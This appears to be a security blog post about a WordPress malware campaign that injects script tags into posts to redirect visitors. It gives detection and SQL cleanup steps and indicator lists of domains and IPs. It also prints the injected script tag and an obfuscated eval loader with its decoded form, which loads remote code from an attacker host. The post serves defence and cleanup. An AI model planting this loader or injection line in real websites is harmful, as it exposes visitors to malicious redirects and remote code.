According to publicwww about 5000 websites are known to be infected with this type of WordPress malware. It is similar to legendarytable.com malware and adds js code into every post and page so that visitors are redirected to third-party websites.
Check if infected
To check if your website is infected, open PHPMyAdmin, select your database, and search for “cofounderspecials.com“:

If there are results you will see Browse link next to the table:


To clean these files from the database, run:
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://trick.cofounderspecials.com/track.js?v=9.999' type='text/javascript'></script>", " ")
Analysis
The script https://trick.cofounderspecials.com/track.js?v=9.999 shows:
eval(String.fromCharCode(118,97,114,32,112,115,115,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,115,115,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,115,115,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,115,115,91,105,93,46,105,100,32,61,61,32,34,115,112,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,112,101,99,116,114,101,112,111,105,110,116,34,59,115,46,97,115,121,110,99,61,116,114,117,101,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,56,44,49,49,49,44,57,55,44,49,48,48,44,52,54,44,57,56,44,49,48,49,44,49,49,54,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,49,48,52,44,49,48,53,44,49,49,54,44,49,48,49,44,57,57,44,49,49,49,44,49,48,56,44,49,49,55,44,49,48,57,44,49,49,48,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,48,56,44,57,55,44,49,49,53,44,49,48,52,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,56,44,52,54,44,53,55,44,52,54,44,53,53,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));
decoded:
> 'var psss = document.getElementsByTagName("script"); var wantmee = false;for (var i = 0; i < psss.length; i++) { if (psss[i].id) { if (psss[i].id == "spectrepoint"){ wantmee=true; } } }if(wantmee==false){ var d=document;var s=d.createElement('script'); s.id="spectrepoint";s.async=true;s.src=String.fromCharCode(104,116,116,112,115,58,47,47,108,111,97,100,46,98,101,116,116,101,114,115,104,105,116,101,99,111,108,117,109,110,46,99,111,109,47,115,108,97,115,104,46,106,115,63,118,61,48,46,57,46,55); if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName('head')[0].appendChild(s);} }'
Detail information
Malicious subdomains:
trick.cofounderspecials.com
spectre.cofounderspecials.com
spectre.cofounderspecials.com
js.cofounderspecials.com
fly.cofounderspecials.com
Malicious URLs:
https://js.cofounderspecials.com/splash.js
https://spectre.cofounderspecials.com/fine.php?pid=4362&tid=68964&cid=555
https://door.cofounderspecials.com/way.php?pid=553246&kid=685&uid=456389&mid=689332
https://cleargreenline.com/?p=mi4tsyrqmu5gi3bpg4ztqny&sub2=dreamspaceee
https://trick.legendarytable.com/news.js?v=9.4.9
https://trick.cofounderspecials.com/way.js?v=0.5.8
https://scripts.bettershitecolumn.com/sort.js?v=001
https://space.bettershitecolumn.com/cadfl8k.php?key=osyg7q7bz5ig7cma3vc7
https://beat.bettershitecolumn.com/bet.php?id=5478sid=32677&lid=68568
https://away.bettershitecolumn.com/track.php?tid=54889&lid=9554-66-457679-29
https://goldflowerservice.com/?p=mq2dgm3dgi5gi3bpg42dgna&sub2=Zvold2
String.fromCharCode:
118,97,114,32,112,115,115,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,115,115,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,115,115,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,115,115,91,105,93,46,105,100,32,61,61,32,34,115,112,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,112,101,99,116,114,101,112,111,105,110,116,34,59,115,46,97,115,121,110,99,61,116,114,117,101,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,56,44,49,49,49,44,57,55,44,49,48,48,44,52,54,44,57,56,44,49,48,49,44,49,49,54,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,49,48,52,44,49,48,53,44,49,49,54,44,49,48,49,44,57,57,44,49,49,49,44,49,48,56,44,49,49,55,44,49,48,57,44,49,49,48,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,48,56,44,57,55,44,49,49,53,44,49,48,52,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,56,44,52,54,44,53,55,44,52,54,44,53,53,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125
Malicious IPs:
88.85.94.246, 91.211.91.112, 101.99.95.147, 91.211.91.104, 185.177.94.108, 51.15.15.159